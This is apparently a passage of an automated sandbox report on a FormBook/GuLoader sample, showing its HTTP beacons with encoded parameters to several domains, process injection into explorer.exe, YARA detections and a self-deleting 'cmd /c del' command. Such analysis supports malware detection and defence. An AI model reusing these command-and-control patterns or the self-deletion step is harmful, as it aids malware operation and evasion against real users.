                                                                                  Date: Thu, 25 Feb 2021 14:49:46 GMT
                                                                                  Server: Apache
                                                                                  Expires: Wed, 11 Jan 1984 05:00:00 GMT
                                                                                  Cache-Control: no-cache, must-revalidate, max-age=0
                                                                                  X-Redirect-By: WordPress
                                                                                  Upgrade: h2,h2c
                                                                                  Connection: Upgrade, close
                                                                                  Location: https://www.africabiocity.com/iae2/?Cb=M0uFvISRXYRHVkOb0AJBAd7B/InOE9ksckU2zFobX8RttE5IKM9SRPMAdsze42ip49A2WvKiMw==&uVjH=yVCTVb0XT254cnY
                                                                                  Content-Length: 0
                                                                                  Content-Type: text/html; charset=UTF-8


                                                                                  Session IDSource IPSource PortDestination IPDestination PortProcess
                                                                                  8192.168.2.649762103.28.36.17180C:\Windows\explorer.exe
                                                                                  TimestampkBytes transferredDirectionData
                                                                                  Feb 25, 2021 15:49:57.717503071 CET6506OUTGET /iae2/?Cb=tlIjdtxg+6ss6GeFkxkNX/Gta+EnXEkPHxZQNKO5opTQPj/ZdNFPdnHw1EJZhrtLdJv1ORZ2Rg==&uVjH=yVCTVb0XT254cnY HTTP/1.1
                                                                                  Host: www.nhadat9chu.com
                                                                                  Connection: close
                                                                                  Data Raw: 00 00 00 00 00 00 00
                                                                                  Data Ascii:
                                                                                  Feb 25, 2021 15:49:58.079749107 CET6506INHTTP/1.1 301 Moved Permanently
                                                                                  Connection: close
                                                                                  Content-Type: text/html; charset=UTF-8
                                                                                  Expires: Wed, 11 Jan 1984 05:00:00 GMT
                                                                                  Cache-Control: no-cache, must-revalidate, max-age=0
                                                                                  X-Redirect-By: WordPress
                                                                                  Location: https://www.nhadat9chu.com/iae2/?Cb=tlIjdtxg+6ss6GeFkxkNX/Gta+EnXEkPHxZQNKO5opTQPj/ZdNFPdnHw1EJZhrtLdJv1ORZ2Rg==&uVjH=yVCTVb0XT254cnY
                                                                                  Content-Length: 0
                                                                                  Date: Thu, 25 Feb 2021 14:49:57 GMT
                                                                                  Server: LiteSpeed


                                                                                  Session IDSource IPSource PortDestination IPDestination PortProcess
                                                                                  9192.168.2.649763185.230.60.10280C:\Windows\explorer.exe
                                                                                  TimestampkBytes transferredDirectionData
                                                                                  Feb 25, 2021 15:50:03.338769913 CET6507OUTGET /iae2/?Cb=2Mu6jGWgIoofF63Ti3l/Zo55WQUYmkW4MO9hv8QsoUu7nlZl5gregCIikYrtIUhyBUOiCNofoA==&uVjH=yVCTVb0XT254cnY HTTP/1.1
                                                                                  Host: www.kfs.ltd
                                                                                  Connection: close
                                                                                  Data Raw: 00 00 00 00 00 00 00
                                                                                  Data Ascii:
                                                                                  Feb 25, 2021 15:50:03.487498999 CET6508INHTTP/1.1 301 Moved Permanently
                                                                                  Date: Thu, 25 Feb 2021 14:50:03 GMT
                                                                                  Content-Length: 0
                                                                                  Connection: close
                                                                                  location: https://www.kfs.ltd/iae2?Cb=2Mu6jGWgIoofF63Ti3l%2FZo55WQUYmkW4MO9hv8QsoUu7nlZl5gregCIikYrtIUhyBUOiCNofoA%3D%3D&uVjH=yVCTVb0XT254cnY
                                                                                  strict-transport-security: max-age=120
                                                                                  x-wix-request-id: 1614264603.42118586673856126181
                                                                                  Age: 0
                                                                                  Server-Timing: cache;desc=miss, varnish;desc=miss, dc;desc=42
                                                                                  X-Seen-By: jeslxIFvDH4ulYwNNi+3Muwfbs+7qUVAqsIx00yI78k=,sHU62EDOGnH2FBkJkG/Wx8EeXWsWdHrhlvbxtlynkVhT9gRHUF6iCEZerWBFcnqX,2d58ifebGbosy5xc+FRalp0JW3SHyhzs9FHT6/ij6dLDCec7qa/EMLCChW50N7/00YaveWPTFu/8+Yg3CfH40w==,2UNV7KOq4oGjA5+PKsX47JeSAtYJ4i5JfWbg2xSNjS4=,m0j2EEknGIVUW/liY8BLLkiHzpTYSDRA7u88Ic3Fde7V0TBmJ+uLPQ4OZPC1VSMH,8Jozq2XDr5/0Pv3E0yMndyYULW1yPqALTkG175wImb9Gp/J3MBzgzU8QHrQuh4zQ,9phxMuSXVGy04obH0oEnZbxJXFeoENGzEv6d1YOaTWMegIHNMbeN98wDstUop/lBWIHlCalF7YnfvOr2cMPpyw==
                                                                                  Cache-Control: no-cache
                                                                                  Expires: -1
                                                                                  Server: Pepyaka/1.15.10


                                                                                  HTTPS Packets

                                                                                  TimestampSource IPSource PortDest IPDest PortSubjectIssuerNot BeforeNot AfterJA3 SSL Client FingerprintJA3 SSL Client Digest
                                                                                  Feb 25, 2021 15:48:25.025437117 CET142.250.184.65443192.168.2.649727CN=*.googleusercontent.com, O=Google LLC, L=Mountain View, ST=California, C=US CN=GTS CA 1O1, O=Google Trust Services, C=USCN=GTS CA 1O1, O=Google Trust Services, C=US CN=GlobalSign, O=GlobalSign, OU=GlobalSign Root CA - R2Tue Jan 26 10:05:02 CET 2021 Thu Jun 15 02:00:42 CEST 2017Tue Apr 20 11:05:01 CEST 2021 Wed Dec 15 01:00:42 CET 2021771,49196-49195-49200-49199-49188-49187-49192-49191-49162-49161-49172-49171-157-156-61-60-53-47-10,0-10-11-13-35-23-65281,29-23-24,037f463bf4616ecd445d4a1937da06e19
                                                                                  CN=GTS CA 1O1, O=Google Trust Services, C=USCN=GlobalSign, O=GlobalSign, OU=GlobalSign Root CA - R2Thu Jun 15 02:00:42 CEST 2017Wed Dec 15 01:00:42 CET 2021

                                                                                  Code Manipulations

                                                                                  Statistics

                                                                                  Behavior

                                                                                  Click to jump to process

                                                                                  System Behavior

                                                                                  Analysis Process: 211094.exe PID: 6984 Parent PID: 5824

                                                                                  General

                                                                                  Start time:15:48:04
                                                                                  Start date:25/02/2021
                                                                                  Path:C:\Users\user\Desktop\211094.exe
                                                                                  Wow64 process (32bit):true
                                                                                  Commandline:'C:\Users\user\Desktop\211094.exe'
                                                                                  Imagebase:0x400000
                                                                                  File size:98304 bytes
                                                                                  MD5 hash:A2BC516696C51F3AFDD8721D6C782360
                                                                                  Has elevated privileges:true
                                                                                  Has administrator privileges:true
                                                                                  Programmed in:Visual Basic
                                                                                  Reputation:low

                                                                                  Analysis Process: 211094.exe PID: 1872 Parent PID: 6984

                                                                                  General

                                                                                  Start time:15:48:13
                                                                                  Start date:25/02/2021
                                                                                  Path:C:\Users\user\Desktop\211094.exe
                                                                                  Wow64 process (32bit):true
                                                                                  Commandline:'C:\Users\user\Desktop\211094.exe'
                                                                                  Imagebase:0x400000
                                                                                  File size:98304 bytes
                                                                                  MD5 hash:A2BC516696C51F3AFDD8721D6C782360
                                                                                  Has elevated privileges:true
                                                                                  Has administrator privileges:true
                                                                                  Programmed in:C, C++ or other language
                                                                                  Yara matches:
                                                                                  • Rule: JoeSecurity_GuLoader, Description: Yara detected GuLoader, Source: 00000004.00000002.399305439.0000000000562000.00000040.00000001.sdmp, Author: Joe Security
                                                                                  • Rule: JoeSecurity_FormBook, Description: Yara detected FormBook, Source: 00000004.00000002.404736024.000000001E290000.00000040.00000001.sdmp, Author: Joe Security
                                                                                  • Rule: Formbook_1, Description: autogenerated rule brought to you by yara-signator, Source: 00000004.00000002.404736024.000000001E290000.00000040.00000001.sdmp, Author: Felix Bilstein - yara-signator at cocacoding dot com
                                                                                  • Rule: Formbook, Description: detect Formbook in memory, Source: 00000004.00000002.404736024.000000001E290000.00000040.00000001.sdmp, Author: JPCERT/CC Incident Response Group
                                                                                  • Rule: JoeSecurity_FormBook, Description: Yara detected FormBook, Source: 00000004.00000002.399177906.0000000000080000.00000040.00000001.sdmp, Author: Joe Security
                                                                                  • Rule: Formbook_1, Description: autogenerated rule brought to you by yara-signator, Source: 00000004.00000002.399177906.0000000000080000.00000040.00000001.sdmp, Author: Felix Bilstein - yara-signator at cocacoding dot com
                                                                                  • Rule: Formbook, Description: detect Formbook in memory, Source: 00000004.00000002.399177906.0000000000080000.00000040.00000001.sdmp, Author: JPCERT/CC Incident Response Group
                                                                                  Reputation:low

                                                                                  Analysis Process: explorer.exe PID: 3440 Parent PID: 1872

                                                                                  General

                                                                                  Start time:15:48:26
                                                                                  Start date:25/02/2021
                                                                                  Path:C:\Windows\explorer.exe
                                                                                  Wow64 process (32bit):false
                                                                                  Commandline:
                                                                                  Imagebase:0x7ff6f22f0000
                                                                                  File size:3933184 bytes
                                                                                  MD5 hash:AD5296B280E8F522A8A897C96BAB0E1D
                                                                                  Has elevated privileges:true
                                                                                  Has administrator privileges:true
                                                                                  Programmed in:C, C++ or other language
                                                                                  Reputation:high

                                                                                  Analysis Process: explorer.exe PID: 776 Parent PID: 3440

                                                                                  General

                                                                                  Start time:15:48:40
                                                                                  Start date:25/02/2021
                                                                                  Path:C:\Windows\SysWOW64\explorer.exe
                                                                                  Wow64 process (32bit):true
                                                                                  Commandline:C:\Windows\SysWOW64\explorer.exe
                                                                                  Imagebase:0xb70000
                                                                                  File size:3611360 bytes
                                                                                  MD5 hash:166AB1B9462E5C1D6D18EC5EC0B6A5F7
                                                                                  Has elevated privileges:true
                                                                                  Has administrator privileges:true
                                                                                  Programmed in:C, C++ or other language
                                                                                  Yara matches:
                                                                                  • Rule: JoeSecurity_FormBook, Description: Yara detected FormBook, Source: 00000009.00000002.587412850.00000000006F0000.00000040.00000001.sdmp, Author: Joe Security
                                                                                  • Rule: Formbook_1, Description: autogenerated rule brought to you by yara-signator, Source: 00000009.00000002.587412850.00000000006F0000.00000040.00000001.sdmp, Author: Felix Bilstein - yara-signator at cocacoding dot com
                                                                                  • Rule: Formbook, Description: detect Formbook in memory, Source: 00000009.00000002.587412850.00000000006F0000.00000040.00000001.sdmp, Author: JPCERT/CC Incident Response Group
                                                                                  • Rule: JoeSecurity_FormBook, Description: Yara detected FormBook, Source: 00000009.00000002.587981327.0000000000B30000.00000004.00000001.sdmp, Author: Joe Security
                                                                                  • Rule: Formbook_1, Description: autogenerated rule brought to you by yara-signator, Source: 00000009.00000002.587981327.0000000000B30000.00000004.00000001.sdmp, Author: Felix Bilstein - yara-signator at cocacoding dot com
                                                                                  • Rule: Formbook, Description: detect Formbook in memory, Source: 00000009.00000002.587981327.0000000000B30000.00000004.00000001.sdmp, Author: JPCERT/CC Incident Response Group
                                                                                  • Rule: JoeSecurity_FormBook, Description: Yara detected FormBook, Source: 00000009.00000002.587932425.0000000000B00000.00000040.00000001.sdmp, Author: Joe Security
                                                                                  • Rule: Formbook_1, Description: autogenerated rule brought to you by yara-signator, Source: 00000009.00000002.587932425.0000000000B00000.00000040.00000001.sdmp, Author: Felix Bilstein - yara-signator at cocacoding dot com
                                                                                  • Rule: Formbook, Description: detect Formbook in memory, Source: 00000009.00000002.587932425.0000000000B00000.00000040.00000001.sdmp, Author: JPCERT/CC Incident Response Group
                                                                                  • Rule: LokiBot_Dropper_Packed_R11_Feb18, Description: Auto-generated rule - file scan copy.pdf.r11, Source: 00000009.00000002.587887659.0000000000983000.00000004.00000020.sdmp, Author: Florian Roth
                                                                                  • Rule: LokiBot_Dropper_Packed_R11_Feb18, Description: Auto-generated rule - file scan copy.pdf.r11, Source: 00000009.00000002.592534520.0000000004FC7000.00000004.00000001.sdmp, Author: Florian Roth
                                                                                  Reputation:high

                                                                                  Analysis Process: cmd.exe PID: 6648 Parent PID: 776

                                                                                  General

                                                                                  Start time:15:48:43
                                                                                  Start date:25/02/2021
                                                                                  Path:C:\Windows\SysWOW64\cmd.exe
                                                                                  Wow64 process (32bit):true
                                                                                  Commandline:/c del 'C:\Users\user\Desktop\211094.exe'
                                                                                  Imagebase:0x2a0000
                                                                                  File size:232960 bytes
                                                                                  MD5 hash:F3BDBE3BB6F734E357235F4D5898582D
                                                                                  Has elevated privileges:true
                                                                                  Has administrator privileges:true
                                                                                  Programmed in:C, C++ or other language
                                                                                  Reputation:high

                                                                                  Analysis Process: conhost.exe PID: 6700 Parent PID: 6648

                                                                                  General

                                                                                  Start time:15:48:43
                                                                                  Start date:25/02/2021
                                                                                  Path:C:\Windows\System32\conhost.exe
                                                                                  Wow64 process (32bit):false
                                                                                  Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                                                  Imagebase:0x7ff61de10000
                                                                                  File size:625664 bytes
                                                                                  MD5 hash:EA777DEEA782E8B4D7C7C33BBF8A4496
                                                                                  Has elevated privileges:true
                                                                                  Has administrator privileges:true
                                                                                  Programmed in:C, C++ or other language
                                                                                  Reputation:high

                                                                                  Disassembly

                                                                                  Code Analysis

                                                                                  Reset < >